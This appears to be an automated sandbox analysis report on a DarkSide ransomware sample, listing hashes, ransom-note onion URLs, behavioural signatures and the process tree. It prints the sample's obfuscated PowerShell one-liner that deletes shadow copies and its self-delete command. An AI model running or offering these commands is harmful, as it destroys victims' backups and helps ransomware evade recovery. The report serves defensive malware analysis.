Analysis
-
max time kernel
47s -
max time network
96s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
26-07-2021 12:57
Static task
static1
Behavioral task
behavioral1
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
Resource
win10v20210408
General
-
Target
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
Malware Config
Extracted
C:\\README.341d6443.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\RepairProtect.png => C:\Users\Admin\Pictures\RepairProtect.png.341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe File opened for modification C:\Users\Admin\Pictures\RepairProtect.png.341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe File renamed C:\Users\Admin\Pictures\PushDebug.tif => C:\Users\Admin\Pictures\PushDebug.tif.341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe File opened for modification C:\Users\Admin\Pictures\PushDebug.tif.341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1364 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exepid process 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Control Panel 1 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Modifies registry class 5 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exepid process 1768 powershell.exe 1768 powershell.exe 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeSecurityPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeTakeOwnershipPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeLoadDriverPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeSystemProfilePrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeSystemtimePrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeProfSingleProcessPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeIncBasePriorityPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeCreatePagefilePrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeBackupPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeRestorePrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeShutdownPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeDebugPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeSystemEnvironmentPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeRemoteShutdownPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeUndockPrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeManageVolumePrivilege 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: 33 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: 34 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: 35 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeBackupPrivilege 1060 vssvc.exe Token: SeRestorePrivilege 1060 vssvc.exe Token: SeAuditPrivilege 1060 vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exedescription pid process target process PID 1212 wrote to memory of 1768 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe powershell.exe PID 1212 wrote to memory of 1768 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe powershell.exe PID 1212 wrote to memory of 1768 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe powershell.exe PID 1212 wrote to memory of 1768 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe powershell.exe PID 1212 wrote to memory of 1364 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe cmd.exe PID 1212 wrote to memory of 1364 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe cmd.exe PID 1212 wrote to memory of 1364 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe cmd.exe PID 1212 wrote to memory of 1364 1212 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\17139A~1.EXE >> NUL2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6f8088c66ec2be86eeac0108dc183e64
SHA1ba12519221c27cf86a9f0639994a361a3415d420
SHA2562c0d42f9db1946c4b3312ef7eda65db8b427dcda9d6e2133921d4a583a30e1c5
SHA512542a1acb7bad4d1bb48cc3770ecaa39023a973c8077c8935ce18683f5e79f33a1f83309143bf673338882f4d19a9e79ed75056fe5ff78848fad1f763e80ad973
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
f77ba8b50b139afd34a4114516a824b3
SHA1641f04444f79b2abd711f8dc709220177cad932f
SHA256e0a9abf09b82cb21e0e98b04b4f41eb314f8c6e4f4cf3c7b1159445534b62c08
SHA51262b5aa138f6b1f469a24ca589b4855610a0e29d43ddb7095b1f307a21823a8061aed9ff5b9668389c944cc1fc2aaf4369a8bfc81bd83c55f81bfb8407b4217c7
-
memory/1212-59-0x0000000076661000-0x0000000076663000-memory.dmpFilesize
8KB
-
memory/1364-72-0x0000000000000000-mapping.dmp
-
memory/1768-65-0x000000001AA20000-0x000000001AA22000-memory.dmpFilesize
8KB
-
memory/1768-64-0x000000001A8F0000-0x000000001A8F1000-memory.dmpFilesize
4KB
-
memory/1768-63-0x000000001AAA0000-0x000000001AAA1000-memory.dmpFilesize
4KB
-
memory/1768-66-0x000000001AA24000-0x000000001AA26000-memory.dmpFilesize
8KB
-
memory/1768-67-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/1768-68-0x000000001C320000-0x000000001C321000-memory.dmpFilesize
4KB
-
memory/1768-69-0x000000001C5F0000-0x000000001C5F1000-memory.dmpFilesize
4KB
-
memory/1768-62-0x000000001A840000-0x000000001A841000-memory.dmpFilesize
4KB
-
memory/1768-61-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmpFilesize
8KB
-
memory/1768-60-0x0000000000000000-mapping.dmp